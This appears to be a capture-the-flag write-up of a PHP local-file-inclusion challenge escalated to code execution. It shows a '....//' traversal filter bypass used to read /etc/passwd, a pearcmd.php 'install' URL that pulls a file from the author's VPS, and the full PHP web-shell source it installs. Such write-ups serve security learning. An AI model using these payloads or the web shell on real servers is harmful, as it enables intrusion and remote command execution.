The main page:
By clicking the "your test" link "some text" appeared. There was a new parameter named "file", from which I could choose a file to open.
This indicated lfi. when I tried to access ../../../../etc/passwd path an error occurred saying there was no such file, but after checking which file the PHP script tried to open I saw that "../" was replaced.
To pass the filter I used ....// such that when it tries to perform the replacement there is still a pair of ../ that remains.
This let me access the /etc/passwd file.
After this, I tried to access common directories.
In the /proc/self/environ file I couldn't see anything useful, but the hostname had lfi-to-rce in its name which confirmed my suspicion.
I tried to access the common locations for RCE, but none seemed to work.
Other locations I tried:
After trying a few more methods with no success, I found one in which I could send a file to the server from my VPS using "pearcmd.php".
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion
The download method tried to save my file in /var/www/html but didn't have permission. I tried different names for the file then I tried to override the existing index.php, but I had no success.
I tried the 4th method, with "install".
Using "http://34.89.210.219:30767/?file=....//....//....//....//usr/local/lib/php/pearcmd.php&+install+http://[myVPSIP]:[myPORT]/index.php" worked and saved the given file to /tmp/pear/download/.
index.php:
if(isset($_GET['command'])) {
$command = $_GET['command'];
$output = shell_exec($command);
echo "<pre>$output</pre>";
} else {
echo "Please provide a command as a 'command' GET parameter.";
}
Then I could access the uploaded file from the server and use any desired command:
http://34.89.210.219:30767/?file=....//....//....//....//tmp/pear/download/index.php&command=ls
The flag.txt was in /
